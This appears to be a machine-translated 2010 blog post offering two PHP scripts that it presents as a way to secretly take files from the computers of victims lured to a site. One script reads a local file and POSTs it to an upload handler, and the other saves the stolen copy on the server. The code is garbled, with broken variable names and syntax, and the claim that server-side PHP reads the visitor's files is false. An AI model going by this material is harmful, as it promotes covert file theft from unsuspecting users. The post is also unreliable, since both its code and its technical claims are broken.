Labels

Wednesday, June 23, 2010

Crime files on the client computer using PHP script By Tomero

Before me clarify the content of this title, I beg to what is practiced here is not to be a negative thing for other people. If you want to practice it with evil intent, everything is not my responsibility.

Okay, back to topic. You certainly did not expect, if an when I know what the plan behind the data you save on your computer. I do not need to call the shaman and stay up all day to wait for the father shaman completed its action, he .. he .. he. Did you know? with the following PHP script, the files exist on the client computer can be retrieved easily and tucked into your server. Enough to deceive the victim to open a site that is already inserted this script, then it will automatically retrieve (upload) to the server path to your destination.Here's the script:




1. First File
 {

/ / This script is made to understand PHP 
/ / File Name: ScrCuri.php 
/ / Function: sending files to a server processors   
  $ Host = 'localhost';    
  $ Port = 80; 
/ / Change the path variable position location upload.php 
  
$ Path = '/ upload.php';/ / Replace variables my file with the file you want to take  
$ Myfile = "c: \ \ autoexec.bat";   $ Content_type = "text / plain";/ / mime type file 

/ / Start Header  
srand ((double) microtime () * 1000000); 
  $ Boundary = "---------------------------". substr (md5 (rand (0.32000)), 0.10); 
  $ Data = "- $ boundary";  
  $ Content_file = join ("", file ($ myfile));  
  $ Data .= "       Content-disposition: form-data; name = \ "myfile\"; filename = \ "$ myfile\"         Content-Type: $ content_type   
 $ Content_file  
-- $ Boundary "; 

  $ Data .="-- \ r \ n \ r \ n ";   
  $ Msg =      "POST $ path HTTP/1.0       
Content-Type: multipart / form-data; boundary = $ boundary       
Content-Length: ". Strlen ($ data)." \ R \ n \ r \ n "; 

/ / End Header    
$ Result = ""; 

// Open Connection   
$ F = fsockopen ($ host, $ port);       
fputs ($ t, $ msg. $ data); 
 / / Get the response + results     

while (!feof($f)) 
{
$result .= fread($f,32000);
}
fclose($f);
// Cetak hasil
echo $result;
?> 

}

2. Second File

/ / File Name: upload.php 
/ / Function: Catching the contents of the header or the request is sent and the process of copying a file from the client's
if (is_uploaded_file($fileku))
{
//Change variables according store name storage file path you want


$store name="/backup_backup_backup/test/autoexec.bat"
copy($fileku, $store name);

//Show results
 echo "OK"; 
} Else { 
echo "Failed to copy file>> 'my $ file'."; 
?>
}
Well, after you save your script on a server / host you. So, to prove it try to access scripts scrcuri.php. example: http://situskamu.com/scrcuri.php, remember! configuration must match lho ... let you easy, aja save both files in the root servers so you, the files accessed on http://situskamu.com/upload.php upload.php. Already understand ??... Yep ... I hope so .. he .. he .. he. 

 To try to access scripts scrcuri.php on windows environment ... what happened? Wowww ... an autoexec.bat file server you have been sipped, the alias is taken from your client computer as an experiment.
Before you feel satisfied, you should know that the script above, is not perfect (once .... So do not be satisfied). Want to know the less ???.. Yeahhh ... I know you also know right???. We know, in our experiment file ... only able to retrieve only certain files that do not necessarily have a target computer. Suppose aja file c: \ tomero.gif, automatically all the computers do not necessarily have a file like that. So, the solution .. aja add a bit of javascript and manipulation of both the script above ... You know .. if you do not know let alone make homework at home or if necessary a lot to learn PHP first. 'm Able to be as well?? The most telling moments is the "Ask TOMERO, Copy-Paste it ..." Basic people be lazy ... he .. he .. he ..
Finally, once again ... everything contained on this info, there kegunanya your hands. I just write and develop your ideas with madsud so be careful with the Internet even though spelled fun ... Forgive, if any mistakes or things that did not pleasing your hearts. Thank you. God Bless ....
Reference: www.php.net

No comments:

Post a Comment